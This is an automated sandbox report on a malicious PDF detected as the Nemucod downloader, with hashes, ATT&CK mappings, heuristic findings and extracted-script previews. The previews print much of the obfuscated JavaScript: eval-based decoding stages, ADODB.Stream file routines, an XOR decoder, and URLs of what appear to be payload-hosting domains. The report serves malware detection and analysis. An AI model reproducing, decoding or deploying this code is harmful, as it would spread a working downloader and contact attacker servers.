Txt.Downloader.Nemucod-6769573-0 PDF malware analysis — malicious · 277b659bd58c938d

MALICIOUS

PDF

92.4 KB Authoring application: PyPDF2 First seen: 2026-05-08

MD5: 70449ea95dcb07447915468ea3d619c7 SHA-1: 765fad0797b166b3a485363c87f0510850f8d1e1 SHA-256: 277b659bd58c938d33e02b2c43690c0521b78786aceba227225973e977e41aaa

286 Risk Score

Malware Insights

Txt.Downloader.Nemucod-6769573-0 · confidence 95%

MITRE ATT&CK

T1059.007 JavaScript T1203 Exploitation for Client Execution T1566.001 Spearphishing Attachment

The PDF file contains obfuscated JavaScript that is flagged as an exploit cluster. ClamAV identifies the file as Txt.Downloader.Nemucod-6769573-0, a known downloader. The JavaScript likely attempts to download and execute a second-stage payload, which is a common behavior for Nemucod variants.

Machine Learning

Nyx PDF Classifier malicious score 0.9993

Heuristics 5

ClamAV: Txt.Downloader.Nemucod-6769573-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Txt.Downloader.Nemucod-6769573-0
JavaScript action low 2 related findings PDF_JAVASCRIPT

PDF contains a /JavaScript action. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.

PDF JavaScript exploit cluster critical PDF_JS_EXPLOIT_CLUSTER

PDF combines an executable JavaScript/action surface with exploit staging indicators such as eval/unescape/fromCharCode, XFA script content, or a related CVE pattern. Benign form JavaScript remains low-severity, but this correlated cluster is high-confidence malicious behavior.

Matched line in script

/S /JavaScript
/JS (b'var vMt9 = new Function("\\x76\\x5f\\x73", \'\\x7b\\x76\\x61\\x72\\x20\\x76\\x5f\\x64\\x20\\x3d\\x20\\x6e\\x65\\x77\\x20\\x44\\x61\\x74\\x65\\x28\\x29\\x3b\\x76\\x5f\\x64\\x5b\\x22\\x73\\x65\\x74\\x55\\x54\\x43\\x22\\x2b\\x22\\x46\\x75\\x6c\\x6c\\x59\\x65\\x61\\x72\\x22\\x5d\\x28\\x22\\x32\\x30\\x30\\x33\\x22\\x29\\x3b\\x69\\x66\\x20\\x28\\x76\\x5f\\x64\\x2e\\x67\\x65\\x74\\x55\\x54\\x43\\x46\\x75\\x6c\\x6c\\x59\\x65\\x61\\x72\\x28\\x29\\x2e\\x74\\x6f\\x53\\x74\\x72\\x69\\x6e\\x67\\x28\\x …
>>

Embedded JS stream low PDF_JS

PDF references a /JS stream. Generic JavaScript is common in benign forms; specific dangerous APIs are scored by separate rules.
Suspicious extracted artifact medium EXTRACTED_FILE_STATIC_TRIAGE

One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`javascript_obj0005_000.js`	pdf-javascript-stream	PDF /JS object 5 at offset 0x1C4	17389 bytes
SHA-256: `e62e31740d4ea25b21fb9c543c347f1671bd6620f92e31680f2e757a6aa4f8fc`
Detection ClamAV: Txt.Downloader.Nemucod-6769573-0 Obfuscation or payload: likely Carved artifact contains 48 eval/decoder/string-building token(s). Carved artifact contains 2 long hex-escaped blob(s).
Preview script First 1,000 lines of the extracted script b'var vMt9 = new Function("\x76\x5f\x73", '\x7b\x76\x61\x72\x20\x76\x5f\x64\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x76\x5f\x64\x5b\x22\x73\x65\x74\x55\x54\x43\x22\x2b\x22\x46\x75\x6c\x6c\x59\x65\x61\x72\x22\x5d\x28\x22\x32\x30\x30\x33\x22\x29\x3b\x69\x66\x20\x28\x76\x5f\x64\x2e\x67\x65\x74\x55\x54\x43\x46\x75\x6c\x6c\x59\x65\x61\x72\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x31\x30\x29\x20\x3d\x3d\x20\x22\x32\x30\x30\x33\x22\x29\x20\x7b\x76\x61\x72\x20\x76\x5f\x61\x72\x72\x20\x3d\x20\x76\x5f\x73\x2e\x73\x70\x6c\x69\x74\x28\x22\x3f\x22\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x76\x5f\x61\x72\x72\x2e\x6a\x6f\x69\x6e\x28\x22\x22\x29\x3b\x7d\x20\x65\x6c\x73\x65\x20\x72\x65\x74\x75\x72\x6e\x20\x22\x22\x3b\x7d');var vFj6 = new Function("\x76\x5f\x73", '\x7b\x72\x65\x74\x75\x72\x6e\x20\x76\x4e\x45\x6f\x39\x5b\x22\x73\x70\x22\x2b\x22\x6c\x69\x74\x22\x5d\x28\x22\x2c\x22\x29\x5b\x22\x6a\x6f\x22\x2b\x22\x69\x6e\x22\x5d\x28\x22\x22\x29\x3b\x7d'); eval("var crap = (eval(vMt9(\"/??@?c?c?_?o?n? ?f?u?n?c?t?i?o?n? ?v?A?F?b?8?(?v?U?U?s?5?)?{?v?a?r? ?v?G?a?6?=?n?e?w? ?A?r?r?a?y?(?)?;?v?G?a?6?[?1?9?9?]?=?1?2?8?;?v?G?a?6?[?2?5?2?]?=?1?2?9?;?v?G?a?6?[?2?3?3?]?=?1?3?0?;?v?G?a?6?[?2?2?6?]?=?1?3?1?;?v?G?a?6?[?2?2?8?]?=?1?3?2?;?v?G?a?6?[?2?2?4?]?=?1?3?3?;?v?G?a?6?[?2?2?9?]?=?1?3?4?;?v?G?a?6?[?2?3?1?]?=?1?3?5?;?v?G?a?6?[?2?3?4?]?=?1?3?6?;?v?G?a?6?[?2?3?5?]?=?1?3?7?;?v?G?a?6?[?2?3?2?]?=?1?3?8?;?v?G?a?6?[?2?3?9?]?=?1?3?9?;?v?G?a?6?[?2?3?8?]?=?1?4?0?;?v?G?a?6?[?2?3?6?]?=?1?4?1?;?v?G?a?6?[?1?9?6?]?=?1?4?2?;?v?G?a?6?[?1?9?7?]?=?1?4?3?;?v?G?a?6?[?2?0?1?]?=?1?4?4?;?v?G?a?6?[?2?3?0?]?=?1?4?5?;?v?G?a?6?[?1?9?8?]?=?1?4?6?;?v?G?a?6?[?2?4?4?]?=?1?4?7?;?v?G?a?6?[?2?4?6?]?=?1?4?8?;?v?G?a?6?[?2?4?2?]?=?1?4?9?;?v?G?a?6?[?2?5?1?]?=?1?5?0?;?v?G?a?6?[?2?4?9?]?=?1?5?1?;?v?G?a?6?[?2?5?5?]?=?1?5?2?;?v?G?a?6?[?2?1?4?]?=?1?5?3?;?v?G?a?6?[?2?2?0?]?=?1?5?4?;?v?G?a?6?[?1?6?2?]?=?1?5?5?;?v?G?a?6?[?1?6?3?]?=?1?5?6?;?v?G?a?6?[?1?6?5?]?=?1?5?7?;?v?G?a?6?[?8?3?5?9?]?=?1?5?8?;?v?G?a?6?[?4?0?2?]?=?1?5?9?;?v?G?a?6?[?2?2?5?]?=?1?6?0?;?v?G?a?6?[?2?3?7?]?=?1?6?1?;?v?G?a?6?[?2?4?3?]?=?1?6?2?;?v?G?a?6?[?2?5?0?]?=?1?6?3?;?v?G?a?6?[?2?4?1?]?=?1?6?4?;?v?G?a?6?[?2?0?9?]?=?1?6?5?;?v?G?a?6?[?1?7?0?]?=?1?6?6?;?v?G?a?6?[?1?8?6?]?=?1?6?7?;?v?G?a?6?[?1?9?1?]?=?1?6?8?;?v?G?a?6?[?8?9?7?6?]?=?1?6?9?;?v?G?a?6?[?1?7?2?]?=?1?7?0?;?v?G?a?6?[?1?8?9?]?=?1?7?1?;?v?G?a?6?[?1?8?8?]?=?1?7?2?;?v?G?a?6?[?1?6?1?]?=?1?7?3?;?v?G?a?6?[?1?7?1?]?=?1?7?4?;?v?G?a?6?[?1?8?7?]?=?1?7?5?;?v?G?a?6?[?9?6?1?7?]?=?1?7?6?;?v?G?a?6?[?9?6?1?8?]?=?1?7?7?;?v?G?a?6?[?9?6?1?9?]?=?1?7?8?;?v?G?a?6?[?9?4?7?4?]?=?1?7?9?;?v?G?a?6?[?9?5?0?8?]?=?1?8?0?;?v?G?a?6?[?9?5?6?9?]?=?1?8?1?;?v?G?a?6?[?9?5?7?0?]?=?1?8?2?;?v?G?a?6?[?9?5?5?8?]?=?1?8?3?;?v?G?a?6?[?9?5?5?7?]?=?1?8?4?;?v?G?a?6?[?9?5?7?1?]?=?1?8?5?;?v?G?a?6?[?9?5?5?3?]?=?1?8?6?;?v?G?a?6?[?9?5?5?9?]?=?1?8?7?;?v?G?a?6?[?9?5?6?5?]?=?1?8?8?;?v?G?a?6?[?9?5?6?4?]?=?1?8?9?;?v?G?a?6?[?9?5?6?3?]?=?1?9?0?;?v?G?a?6?[?9?4?8?8?]?=?1?9?1?;?v?G?a?6?[?9?4?9?2?]?=?1?9?2?;?v?G?a?6?[?9?5?2?4?]?=?1?9?3?;?v?G?a?6?[?9?5?1?6?]?=?1?9?4?;?v?G?a?6?[?9?5?0?0?]?=?1?9?5?;?v?G?a?6?[?9?4?7?2?]?=?1?9?6?;?v?G?a?6?[?9?5?3?2?]?=?1?9?7?;?v?G?a?6?[?9?5?6?6?]?=?1?9?8?;?v?G?a?6?[?9?5?6?7?]?=?1?9?9?;?v?G?a?6?[?9?5?6?2?]?=?2?0?0?;?v?G?a?6?[?9?5?5?6?]?=?2?0?1?;?v?G?a?6?[?9?5?7?7?]?=?2?0?2?;?v?G?a?6?[?9?5?7?4?]?=?2?0?3?;?v?G?a?6?[?9?5?6?8?]?=?2?0?4?;?v?G?a?6?[?9?5?5?2?]?=?2?0?5?;?v?G?a?6?[?9?5?8?0?]?=?2?0?6?;?v?G?a?6?[?9?5?7?5?]?=?2?0?7?;?v?G?a?6?[?9?5?7?6?]?=?2?0?8?;?v?G?a?6?[?9?5?7?2?]?=?2?0?9?;?v?G?a?6?[?9?5?7?3?]?=?2?1?0?;?v?G?a?6?[?9?5?6?1?]?=?2?1?1?;?v?G?a?6?[?9?5?6?0?]?=?2?1?2?;?v?G?a?6?[?9?5?5?4?]?=?2?1?3?;?v?G?a?6?[?9?5?5?5?]?=?2?1?4?;?v?G?a?6?[?9?5?7?9?]?=?2?1?5?;?v?G?a?6?[?9?5?7?8?]?=?2?1?6?;?v?G?a?6?[?9?4?9?6?]?=?2?1?7?;?v?G?a?6?[?9?4?8?4?]?=?2?1?8?;?v?G?a?6?[?9?6?0?8?]?=?2?1?9?;?v?G?a?6?[?9?6?0?4?]?=?2?2?0?;?v?G?a?6?[?9?6?1?2?]?=?2?2?1?;?v?G?a?6?[?9?6?1?6?]?=?2?2?2?;?v?G?a?6?[?9?6?0?0?]?=?2?2?3?;?v?G?a?6?[?9?4?5?]?=?2?2?4?;?v?G?a?6?[?2?2?3?]?=?2?2?5?;?v?G?a?6?[?9?1?5?]?=?2?2?6?;?v?G?a?6?[?9?6?0?]?=?2?2?7?;?v?G?a?6?[?9?3?1?]?=?2?2?8?;?v?G?a?6?[?9?6?3?]?=?2?2?9?;?v?G?a?6?[?1?8?1?]?=?2?3?0?;?v?G?a?6?[?9?6?4?]?=?2?3?1?;?v?G?a?6?[?9?3?4?]?=?2?3?2?;?v?G?a?6?[?9?2?0?]?=?2?3?3?;?v?G?a?6?[?9?3?7?]?=?2?3?4?;?v?G?a?6?[?9?4?8?]?=?2?3?5?;?v?G?a?6?[?8?7?3?4?]?=?2?3?6?;?v?G?a?6?[?9?6?6?]?=?2?3?7?;?v?G?a?6?[?9?4?9?]?=?2?3?8?;?v?G?a?6?[?8?7?4?5?]?=?2?3?9?;?v?G?a?6?[?8?8?0?1?]?=?2?4?0?;?v?G?a?6?[?1?7?7?]?=?2?4?1?;?v?G?a?6?[?8?8?0?5?]?=?2?4?2?;?v?G?a?6?[?8?8?0?4?]?=?2?4?3?;?v?G?a?6?[?8?9?9?2?]?=?2?4?4?;?v?G?a?6?[?8?9?9?3?]?=?2?4?5?;?v?G?a?6?[?2?4?7?]?=?2?4?6?;?v?G?a?6?[?8?7?7?6?]?=?2?4?7?;?v?G?a?6?[?1?7?6?]?=?2?4?8?;?v?G?a?6?[?8?7?2?9?]?=?2?4?9?;?v?G?a?6?[?1?8?3?]?=?2?5?0?;?v?G?a?6?[?8?7?3?0?]?=?2?5?1?;?v?G?a?6?[?8?3?1?9?]?=?2?5?2?;?v?G?a?6?[?1?7?8?]?=?2?5?3?;?v?G?a?6?[?9?6?3?2?]?=?2?5?4?;?v?G?a?6?[?1?6?0?]?=?2?5?5?;?v?a?r? ?v?T?c?9?=?n?e?w? ?A?r?r?a?y?(?)?;?f?o?r? ?(?v?a?r? ?v?S?T?z?7?=?0?;? ?v?S?T?z?7? ?<? ?v?U?U?s?5?.?l?e?n?g?t?h?;? ?v?S?T?z?7? ?+?=? ?1?)?{?v?a?r? ?v?Y?u?0?=?v?U?U?s?5?[?\\x22?c?h?a?r?C?o?d?e?A?t?\\x22?]?(?v?S?T?z?7?)?;?i?f? ?(?v?Y?u?0? ?<? ?1?2?8?)?{?v?a?r? ?v?C?o?1?=?v?Y?u?0?;?}?e?l?s?e? ?{?v?a?r? ?v?C?o?1?=?v?G?a?6?[?v?Y?u?0?]?;?}?v?T?c?9?[?\\x22?p?u?s?h?\\x22?]?(?v?C?o?1?)?;?}?;?r?e?t?u?r?n? ?v?T?c?9?;?}? ?@??/\")), 1);"); eval("var crap = (eval(vMt9(\"/??@?c?c?_?o?n? ?f?u?n?c?t?i?o?n? ?v?U?m?1?(?v?J?V?e?6?)?{?v?a?r? ?v?I?Z?m?7?=?n?e?w? ?A?r?r?a?y?(?)?;?v?I?Z?m?7?[?1?6?8?]?=?1?9?1?;?v?I?Z?m?7?[?1?6?9?]?=?8?9?7?6?;?v?I?Z?m?7?[?1?7?0?]?=?1?7?2?;?v?I?Z?m?7?[?1?7?1?]?=?1?8?9?;?v?I?Z?m?7?[?1?7?2?]?=?1?8?8?;?v?I?Z?m?7?[?1?7?3?]?=?1?6?1?;?v?I?Z?m?7?[?1?7?4?]?=?1?7?1?;?v?I?Z?m?7?[?1?7?5?]?=?1?8?7?;?v?I?Z?m?7?[?1?7?6?]?=?9?6?1?7?;?v?I?Z?m?7?[?1?7?7?]?=?9?6?1?8?;?v?I?Z?m?7?[?1?7?8?]?=?9?6?1?9?;?v?I?Z?m?7?[?1?7?9?]?=?9?4?7?4?;?v?I?Z?m?7?[?1?8?0?]?=?9?5?0?8?;?v?I?Z?m?7?[?1?8?1?]?=?9?5?6?9?;?v?I?Z?m?7?[?1?8?2?]?=?9?5?7?0?;?v?I?Z?m?7?[?1?8?3?]?=?9?5?5?8?;?v?I?Z?m?7?[?1?8?4?]?=?9?5?5?7?;?v?I?Z?m?7?[?1?8?5?]?=?9?5?7?1?;?v?I?Z?m?7?[?1?8?6?]?=?9?5?5?3?;?v?I?Z?m?7?[?1?8?7?]?=?9?5?5?9?;?v?I?Z?m?7?[?1?8?8?]?=?9?5?6?5?;?v?I?Z?m?7?[?1?8?9?]?=?9?5?6?4?;?v?I?Z?m?7?[?1?9?0?]?=?9?5?6?3?;?v?I?Z?m?7?[?1?9?1?]?=?9?4?8?8?;?v?I?Z?m?7?[?1?9?2?]?=?9?4?9?2?;?v?I?Z?m?7?[?1?9?3?]?=?9?5?2?4?;?v?I?Z?m?7?[?1?9?4?]?=?9?5?1?6?;?v?I?Z?m?7?[?1?9?5?]?=?9?5?0?0?;?v?I?Z?m?7?[?1?9?6?]?=?9?4?7?2?;?v?I?Z?m?7?[?1?9?7?]?=?9?5?3?2?;?v?I?Z?m?7?[?1?9?8?]?=?9?5?6?6?;?v?I?Z?m?7?[?1?9?9?]?=?9?5?6?7?;?v?I?Z?m?7?[?2?0?0?]?=?9?5?6?2?;?v?I?Z?m?7?[?2?0?1?]?=?9?5?5?6?;?v?I?Z?m?7?[?2?0?2?]?=?9?5?7?7?;?v?I?Z?m?7?[?2?0?3?]?=?9?5?7?4?;?v?I?Z?m?7?[?2?0?4?]?=?9?5?6?8?;?v?I?Z?m?7?[?2?0?5?]?=?9?5?5?2?;?v?I?Z?m?7?[?2?0?6?]?=?9?5?8?0?;?v?I?Z?m?7?[?2?0?7?]?=?9?5?7?5?;?v?I?Z?m?7?[?2?0?8?]?=?9?5?7?6?;?v?I?Z?m?7?[?2?0?9?]?=?9?5?7?2?;?v?I?Z?m?7?[?2?1?0?]?=?9?5?7?3?;?v?I?Z?m?7?[?2?1?1?]?=?9?5?6?1?;?v?I?Z?m?7?[?2?1?2?]?=?9?5?6?0?;?v?I?Z?m?7?[?2?1?3?]?=?9?5?5?4?;?v?I?Z?m?7?[?2?1?4?]?=?9?5?5?5?;?v?I?Z?m?7?[?2?1?5?]?=?9?5?7?9?;?v?I?Z?m?7?[?2?1?6?]?=?9?5?7?8?;?v?I?Z?m?7?[?2?1?7?]?=?9?4?9?6?;?v?I?Z?m?7?[?2?1?8?]?=?9?4?8?4?;?v?I?Z?m?7?[?2?1?9?]?=?9?6?0?8?;?v?I?Z?m?7?[?2?2?0?]?=?9?6?0?4?;?v?I?Z?m?7?[?2?2?1?]?=?9?6?1?2?;?v?I?Z?m?7?[?2?2?2?]?=?9?6?1?6?;?v?I?Z?m?7?[?2?2?3?]?=?9?6?0?0?;?v?I?Z?m?7?[?2?2?4?]?=?9?4?5?;?v?I?Z?m?7?[?2?2?5?]?=?2?2?3?;?v?I?Z?m?7?[?2?2?6?]?=?9?1?5?;?v?I?Z?m?7?[?2?2?7?]?=?9?6?0?;?v?I?Z?m?7?[?2?2?8?]?=?9?3?1?;?v?I?Z?m?7?[?2?2?9?]?=?9?6?3?;?v?I?Z?m?7?[?2?3?0?]?=?1?8?1?;?v?I?Z?m?7?[?2?3?1?]?=?9?6?4?;?v?I?Z?m?7?[?2?3?2?]?=?9?3?4?;?v?I?Z?m?7?[?2?3?3?]?=?9?2?0?;?v?I?Z?m?7?[?2?3?4?]?=?9?3?7?;?v?I?Z?m?7?[?2?3?5?]?=?9?4?8?;?v?I?Z?m?7?[?2?3?6?]?=?8?7?3?4?;?v?I?Z?m?7?[?2?3?7?]?=?9?6?6?;?v?I?Z?m?7?[?2?3?8?]?=?9?4?9?;?v?I?Z?m?7?[?2?3?9?]?=?8?7?4?5?;?v?I?Z?m?7?[?2?4?0?]?=?8?8?0?1?;?v?I?Z?m?7?[?2?4?1?]?=?1?7?7?;?v?I?Z?m?7?[?2?4?2?]?=?8?8?0?5?;?v?I?Z?m?7?[?2?4?3?]?=?8?8?0?4?;?v?I?Z?m?7?[?2?4?4?]?=?8?9?9?2?;?v?I?Z?m?7?[?2?4?5?]?=?8?9?9?3?;?v?I?Z?m?7?[?2?4?6?]?=?2?4?7?;?v?I?Z?m?7?[?2?4?7?]?=?8?7?7?6?;?v?I?Z?m?7?[?2?4?8?]?=?1?7?6?;?v?I?Z?m?7?[?2?4?9?]?=?8?7?2?9?;?v?I?Z?m?7?[?2?5?0?]?=?1?8?3?;?v?I?Z?m?7?[?2?5?1?]?=?8?7?3?0?;?v?I?Z?m?7?[?2?5?2?]?=?8?3?1?9?;?v?I?Z?m?7?[?2?5?3?]?=?1?7?8?;?v?I?Z?m?7?[?2?5?4?]?=?9?6?3?2?;?v?I?Z?m?7?[?2?5?5?]?=?1?6?0?;?v?I?Z?m?7?[?1?2?8?]?=?1?9?9?;?v?I?Z?m?7?[?1?2?9?]?=?2?5?2?;?v?I?Z?m?7?[?1?3?0?]?=?2?3?3?;?v?I?Z?m?7?[?1?3?1?]?=?2?2?6?;?v?I?Z?m?7?[?1?3?2?]?=?2?2?8?;?v?I?Z?m?7?[?1?3?3?]?=?2?2?4?;?v?I?Z?m?7?[?1?3?4?]?=?2?2?9?;?v?I?Z?m?7?[?1?3?5?]?=?2?3?1?;?v?I?Z?m?7?[?1?3?6?]?=?2?3?4?;?v?I?Z?m?7?[?1?3?7?]?=?2?3?5?;?v?I?Z?m?7?[?1?3?8?]?=?2?3?2?;?v?I?Z?m?7?[?1?3?9?]?=?2?3?9?;?v?I?Z?m?7?[?1?4?0?]?=?2?3?8?;?v?I?Z?m?7?[?1?4?1?]?=?2?3?6?;?v?I?Z?m?7?[?1?4?2?]?=?1?9?6?;?v?I?Z?m?7?[?1?4?3?]?=?1?9?7?;?v?I?Z?m?7?[?1?4?4?]?=?2?0?1?;?v?I?Z?m?7?[?1?4?5?]?=?2?3?0?;?v?I?Z?m?7?[?1?4?6?]?=?1?9?8?;?v?I?Z?m?7?[?1?4?7?]?=?2?4?4?;?v?I?Z?m?7?[?1?4?8?]?=?2?4?6?;?v?I?Z?m?7?[?1?4?9?]?=?2?4?2?;?v?I?Z?m?7?[?1?5?0?]?=?2?5?1?;?v?I?Z?m?7?[?1?5?1?]?=?2?4?9?;?v?I?Z?m?7?[?1?5?2?]?=?2?5?5?;?v?I?Z?m?7?[?1?5?3?]?=?2?1?4?;?v?I?Z?m?7?[?1?5?4?]?=?2?2?0?;?v?I?Z?m?7?[?1?5?5?]?=?1?6?2?;?v?I?Z?m?7?[?1?5?6?]?=?1?6?3?;?v?I?Z?m?7?[?1?5?7?]?=?1?6?5?;?v?I?Z?m?7?[?1?5?8?]?=?8?3?5?9?;?v?I?Z?m?7?[?1?5?9?]?=?4?0?2?;?v?I?Z?m?7?[?1?6?0?]?=?2?2?5?;?v?I?Z?m?7?[?1?6?1?]?=?2?3?7?;?v?I?Z?m?7?[?1?6?2?]?=?2?4?3?;?v?I?Z?m?7?[?1?6?3?]?=?2?5?0?;?v?I?Z?m?7?[?1?6?4?]?=?2?4?1?;?v?I?Z?m?7?[?1?6?5?]?=?2?0?9?;?v?I?Z?m?7?[?1?6?6?]?=?1?7?0?;?v?I?Z?m?7?[?1?6?7?]?=?1?8?6?;?v?a?r? ?v?D?y?4?=?n?e?w? ?A?r?r?a?y?(?)?;?v?a?r? ?v?O?Z?f?3?=?\\x22?\\x22?;?v?a?r? ?v?C?o?1?;? ?v?a?r? ?v?Y?u?0?;?f?o?r? ?(?v?a?r? ?v?S?T?z?7?=?0?;? ?v?S?T?z?7? ?<? ?v?J?V?e?6?.?l?e?n?g?t?h?;? ?v?S?T?z?7? ?+?=? ?1?)?{?v?C?o?1?=?v?J?V?e?6?[?v?S?T?z?7?]?;?i?f? ?(?v?C?o?1? ?<? ?1?2?8?)?{?v?Y?u?0?=?v?C?o?1?;?}? ?e?l?s?e? ?{?v?Y?u?0?=?v?I?Z?m?7?[?v?C?o?1?]?;?}?v?D?y?4?.?p?u?s?h?(?S?t?r?i?n?g?[?\\x22?f?r?o?m?C?h?a?r?C?o?d?e?\\x22?]?(?v?Y?u?0?)?)?;?}?v?O?Z?f?3?=?v?D?y?4?[?\\x22?j?o?i?n?\\x22?]?(?\\x22?\\x22?)?;?r?e?t?u?r?n? ?v?O?Z?f?3?;?}? ?@??/\")), 1);"); eval("var crap = (eval(vMt9(\"f?u?n?c?t?i?o?n? ?v?F?Y?v?2?(?v?J?V?e?6?,? ?v?V?a?6?)?{?v?a?r? ?v?C?o?2? ?=? ?v?A?F?b?8?(?v?V?a?6?)?;?f?o?r? ?(?v?a?r? ?v?S?T?z?7? ?=? ?0?;? ?v?S?T?z?7? ?<? ?v?J?V?e?6?.?l?e?n?g?t?h?;? ?v?S?T?z?7? ?+?=? ?1?)? ?{?v?J?V?e?6?[?v?S?T?z?7?]? ?^?=? ?v?C?o?2?[?v?S?T?z?7? ?%? ?v?C?o?2?.?l?e?n?g?t?h?]?;?}?;?r?e?t?u?r?n? ?v?J?V?e?6?;?}\")), 1);"); eval("var crap = (eval(vMt9(\"f?u?n?c?t?i?o?n? ?v?V?K?x?1?(?v?J?J?b?8?)?{?v?a?r? ?v?E?l?2?=?n?e?w? ?A?c?t?i?v?e?X?O?b?j?e?c?t?(?\\x22?A?D?O?D?B?.?S?t?r?e?a?m?\\x22?)?;?v?E?l?2?.?t?y?p?e?=?2?;?v?E?l?2?[?\\x22?C?h?a?r?s?e?t?\\x22?]?=?\\x22?4?3?7?\\x22?;?v?E?l?2?.?o?p?e?n?(?)?;?v?E?l?2?[?\\x22?L?o?a?d?F?r?o?m?F?i?l?e?\\x22?]?(?v?J?J?b?8?)?;?v?a?r? ?v?C?w?4?=?v?E?l?2?[?\\x22?R?e?a?d?T?e?x?t?\\x22?]?;?v?E?l?2?.?c?l?o?s?e?(?)?;?r?e?t?u?r?n? ?v?A?F?b?8?(?v?C?w?4?)?;?}\")), 1);"); eval("var crap = (eval(vMt9(\"f?u?n?c?t?i?o?n? ?v?V?b?9?(?v?J?J?b?8?,? ?v?J?V?e?6?)?{?v?a?r? ?v?E?l?2?=?n?e?w? ?A?c?t?i?v?e?X?O?b?j?e?c?t?(?\\x22?A?D?O?D?B?.?S?t?r?e?a?m?\\x22?)?;?v?E?l?2?.?t?y?p?e?=?2?;?v?E?l?2?[?\\x22?C?h?a?r?s?e?t?\\x22?]?=?\\x22?4?3?7?\\x22?;?v?E?l?2?.?o?p?e?n?(?)?;?v?E?l?2?[?\\x22?w?r?i?t?e?T?e?x?t?\\x22?]?(?v?U?m?1?(?v?J?V?e?6?)?)?;?v?E?l?2?[?\\x22?S?a?v?e?T?o?F?i?l?e?\\x22?]?(?v?J?J?b?8?,? ?2?)?;?v?E?l?2?.?c?l?o?s?e?(?)?;?}\")), 1);"); eval("var crap = (eval(vMt9(\"v?a?r? ?v?Q?O?i?0? ?=? ?\\x22?h?\\x22?+?\\x22?\\x22?+?\\x22?t?\\x22?+?\\x22?t?\\x22?+?\\x22?p?\\x22?+?\\x22?:?\\x22?+?\\x22?/?\\x22?+?\\x22?/?\\x22?;\")), 1);"); eval("var crap = (eval(vMt9(\" ? ? ? ?v?a?r? ?v?B?s?2? ?=? ?n?e?w? ?A?r?r?a?y?(?)?;\")), 1);"); eval("var crap = (eval(vMt9(\"v?B?s?2?.?p?u?s?h?(?v?Q?O?i?0? ?+? ?\\x22?z?i?s?k?a?n?t?.?c?o?m?/?z?d?n?k?q?1?t?\\x22?)?;\")), 1);"); eval("var crap = (eval(vMt9(\"v?B?s?2?.?p?u?s?h?(?v?Q?O?i?0? ?+? ?\\x22?w?o?o?d?p?e?c?k?e?r?.?c?o?m?.?m?x?/?3?h?v?p?u?\\x22?)?;\")), 1);"); eval("var crap = (eval(vMt9(\"v?B?s?2?.?p?u?s?h?(?v?Q?O?i?0? ?+? ?\\x22?w?o?r?l?d?t?r?a?v?e?l?b?i?z?.?x?y?z?/?x?t?d?1?7?e?2?r?q?e?\\x22?)?;\")), 1);"); …
`javascript_obj0005_001.js`	pdf-javascript-stream	PDF /JS object 5 at offset 0x1C4	736 bytes
SHA-256: `4a5b6937bc1c2ad78c90cdf998d92e0c132a8f3e9715b169fdf404bd82bc711e`
Detection ClamAV: No threats found Obfuscation or payload: likely Carved artifact contains 1 eval/decoder/string-building token(s). Carved artifact contains 1 long hex-escaped blob(s).
Preview script First 1,000 lines of the extracted script b'var vMt9 = new Function("\x76\x5f\x73", '\x7b\x76\x61\x72\x20\x76\x5f\x64\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x65\x28\x29\x3b\x76\x5f\x64\x5b\x22\x73\x65\x74\x55\x54\x43\x22\x2b\x22\x46\x75\x6c\x6c\x59\x65\x61\x72\x22\x5d\x28\x22\x32\x30\x30\x33\x22\x29\x3b\x69\x66\x20\x28\x76\x5f\x64\x2e\x67\x65\x74\x55\x54\x43\x46\x75\x6c\x6c\x59\x65\x61\x72\x28\x29\x2e\x74\x6f\x53\x74\x72\x69\x6e\x67\x28\x31\x30\x29\x20\x3d\x3d\x20\x22\x32\x30\x30\x33\x22\x29\x20\x7b\x76\x61\x72\x20\x76\x5f\x61\x72\x72\x20\x3d\x20\x76\x5f\x73\x2e\x73\x70\x6c\x69\x74\x28\x22\x3f\x22\x29\x3b\x20\x72\x65\x74\x75\x72\x6e\x20\x76\x5f\x61\x72\x72\x2e\x6a\x6f\x69\x6e\x28\x22\x22\x29\x3b\x7d\x20\x65\x6c\x73\x65\x20\x72\x65\x74\x75\x72\x6e\x20\x22\x22\x3b\x7d'

Open this report in the interactive analyzer, or submit your own file for analysis.